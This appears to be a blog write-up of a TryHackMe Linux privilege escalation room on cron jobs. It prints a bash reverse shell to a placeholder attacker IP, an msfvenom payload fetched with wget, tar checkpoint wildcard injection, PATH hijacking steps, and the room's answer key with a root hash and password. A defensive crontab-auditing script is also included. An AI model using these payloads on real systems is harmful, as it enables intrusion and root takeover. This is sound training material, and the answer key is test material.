In this video walk-through, we covered Linux privilege escalation through the crontab in Linux. The crontab lists all cron jobs, i.e. programs scheduled to run at specific times.

Introduction

Linux Privilege escalation is a critical concept in cybersecurity, allowing attackers or ethical hackers to gain higher privileges on a system. This article explores different techniques used for Linux privilege escalation, as demonstrated in the TryHackMe Linux PrivEsc module.

Overview

  • Focuses on escalating privileges in Linux systems through cron jobs by:
    • Modifying writable scripts.
    • Exploiting wildcards in commands.
    • Manipulating environment variables.


Understanding Privilege Escalation

Privilege escalation is the process of gaining elevated access to a system. There are two types:

  • Vertical Escalation: Moving from a low-privilege user to root.
  • Horizontal Escalation: Gaining access to another user’s account without increasing privilege level.

Common Linux Privilege Escalation Techniques

1. Exploiting Running Services

One of the common ways to escalate privileges is by exploiting services running as root. For example:

  • Checking for processes running under root using ps aux.
  • Exploiting MySQL running as root by injecting UDF (User Defined Functions).
  • Creating shared libraries to execute arbitrary commands as root.

2. Misconfigured File Permissions

Weak file permissions can be exploited for privilege escalation. For example:

  • If /etc/shadow (which stores password hashes) is readable by all users, an attacker can extract and crack password hashes using tools like John the Ripper.
  • If /etc/shadow is writable, an attacker can directly replace the root password.

3. Cracking Password Hashes

If an attacker can access password hashes, they can use tools like:

  • John the Ripper to crack hashes.
  • hash-identifier to identify the hashing algorithm.

4. Exploiting SUID Binaries

Files with the SUID bit set run with the owner’s privileges. Exploiting these allows an attacker to execute commands as root.

  • Listing SUID binaries: find / -perm -4000 -type f 2>/dev/null
  • Running a SUID binary that spawns a shell: /usr/bin/some_suid_binary

5. Weak Password Policies

If a system has weak password policies:

  • Attackers can perform brute-force attacks.
  • Users may have reused passwords across different accounts, making credential stuffing attacks effective.

Linux Cron Jobs

Cron jobs are programs or scripts which users can schedule to run at specific times or intervals. Cron table files (crontabs) store the configuration for cron jobs. The system-wide crontab is located at /etc/crontab.

1. Inspecting Cron Jobs

  • Command:
cat /etc/crontab

Purpose: Lists all scheduled cron jobs and their associated scripts.

Example Output:

  • Two scripts identified: overwrite.sh and compressed.sh.

2. Privilege Escalation via Writable Cron Job Script

  • Steps:
    1. Locate the script:
locate overwrite.sh

    2. Check script permissions:
ls -la /path/to/overwrite.sh

    3. If writable, overwrite the script with a payload, such as a reverse shell.

Payload Example:

  • Reverse shell in overwrite.sh
bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1

Open a listener on your machine:

nc -lvnp <your_port>

Wait for the cron job to execute the modified script and receive a root shell.

3. Exploiting Wildcards in Commands

  • Target: compressed.sh, which uses a tar command with wildcards.
  • Steps:
    1. Create a reverse shell payload:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f elf -o shell.elf

    2. Transfer the payload to the target machine:
python3 -m http.server
wget http://<your_ip>:<your_port>/shell.elf

    3. Create tar-compatible checkpoint files to exploit the wildcard:
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=sh shell.elf"

The cron job runs tar, which executes the payload due to the wildcard exploitation.

4. Manipulating Environment Variables

  • Context:
    • Cron jobs often rely on the PATH variable to locate scripts or binaries.
    • If PATH includes user-writable directories, malicious scripts can be executed instead of legitimate ones.
  • Steps:
    1. Inspect the PATH variable:
cat /etc/crontab

    2. Create a malicious script in a writable directory that appears in the crontab PATH (e.g., /tmp or ~/):
nano /tmp/overwrite

    Add a reverse shell or any malicious command.

    3. Ensure execution permissions:
chmod +x /tmp/overwrite

The cron job will execute your malicious script because of the writable directory in PATH.
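Added defender-side example (not from the TryHackMe room or the original post): this Python script audits /etc/crontab-style text for the three weaknesses in sections 2 to 4 above: job scripts that are group- or world-writable, PATH entries writable by ordinary users, and tar run with a shell wildcard. The crontab text and temporary directory built in demo() are constructed fixtures, and ROOT_PATH is an assumed default search path, not the room's.

```python
import os
import shlex
import stat
import tempfile

ROOT_PATH = "/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin"  # assumed default

def writable_by_others(path):  # group or world write bit set; a missing path is not flagged
    mode = os.stat(path).st_mode if os.path.exists(path) else 0
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def parse_crontab(text):  # -> (path_dirs, [(user, command), ...]) for /etc/crontab syntax
    path_dirs, jobs = ROOT_PATH.split(":"), []
    for line in map(str.strip, text.splitlines()):
        if not line or line.startswith("#"):
            continue
        if "=" in line.split()[0]:  # variable line such as PATH= or SHELL=
            if line.startswith("PATH="):
                path_dirs = line[5:].strip().split(":")
            continue
        parts = line.split(None, 6)  # m h dom mon dow user command (@reboot lines are skipped)
        if len(parts) == 7:
            jobs.append((parts[5], parts[6]))
    return path_dirs, jobs

def audit(text):  # returns finding strings; an empty list means nothing was flagged
    path_dirs, jobs = parse_crontab(text)
    findings = [f"PATH entry {d} is writable by others" for d in path_dirs
                if writable_by_others(d)]
    for user, command in jobs:
        tokens = shlex.split(command)
        prog = tokens[0]
        if "/" not in prog:  # bare name: cron resolves it through PATH, first hit wins
            prog = next((os.path.join(d, prog) for d in path_dirs
                         if os.path.exists(os.path.join(d, prog))), prog)
        if writable_by_others(prog):
            findings.append(f"job script {prog} (runs as {user}) is writable by others")
        if any(os.path.basename(t) == "tar" for t in tokens) and any("*" in t for t in tokens):
            findings.append(f"tar job for {user} uses a shell wildcard: {command}")
    return findings

def demo():  # constructed fixture: writable dir first in PATH holding a writable overwrite.sh
    home = tempfile.mkdtemp()
    os.chmod(home, 0o777)
    script = os.path.join(home, "overwrite.sh")
    open(script, "w").close()
    os.chmod(script, 0o777)
    crontab = (f"PATH={home}:{ROOT_PATH}\n* * * * * root overwrite.sh\n"
               "* * * * * root cd /home/user && tar czf /tmp/backup.tgz *\n")
    return audit(crontab)
```

Run demo() to see all three findings on the fixture, or pass the contents of a real /etc/crontab to audit() and review each line it returns.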

Linux Privilege Escalation Checklist

  1. Writable Files and Directories:
    • Always check permissions (ls -la) to identify writable scripts or directories.
    • Modify scripts or binaries when permissions allow.
  2. Wildcards in Commands:
    • Exploit wildcards (*) in cron jobs using tools like tar to execute arbitrary commands.
  3. Environment Variables:
    • Check PATH values in /etc/crontab.
    • Place malicious scripts in directories included in the PATH variable.
  4. Safe Practices:
    • Update system tools like tar to prevent exploitation.
    • Avoid including writable directories in the PATH.

Incident Response and Mitigation

To prevent privilege escalation, security teams should:

  • Regularly update software to patch vulnerabilities.
  • Restrict permissions on critical files like /etc/shadow.
  • Monitor user activities for abnormal behavior.
  • Use strong authentication to prevent credential attacks.

Conclusion

  • Techniques Covered:
    • Modifying writable scripts.
    • Exploiting wildcards in cron jobs.
    • Using environment variables for privilege escalation.
  • Outcome:
    • Demonstrated how to escalate privileges to root using cron job vulnerabilities.

Linux privilege escalation is a crucial skill in penetration testing and security auditing. Understanding these techniques helps both attackers and defenders in strengthening system security. Ethical hackers use these methods for testing, while administrators should implement best practices to mitigate risks.

TryHackMe Linux Privesc | Room Answers

What is the root user’s password hash?

$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0

What hashing algorithm was used to produce the root user’s password hash?

sha512crypt

What is the root user’s password?

password123

Run the “id” command as the newroot user. What is the result?

uid=0(root) gid=0(root) groups=0(root)

How many programs is “user” allowed to run via sudo?

11

One program on the list doesn’t have a shell escape sequence on GTFOBins. Which is it?

apache2

What is the value of the PATH variable in /etc/crontab?

/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

What is the full mysql command the user executed?

mysql -h somehost.local -uroot -ppassword123

What file did you find the root user’s credentials in?

/etc/openvpn/auth.txt

What is the name of the option that disables root squashing?

no_root_squash

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.
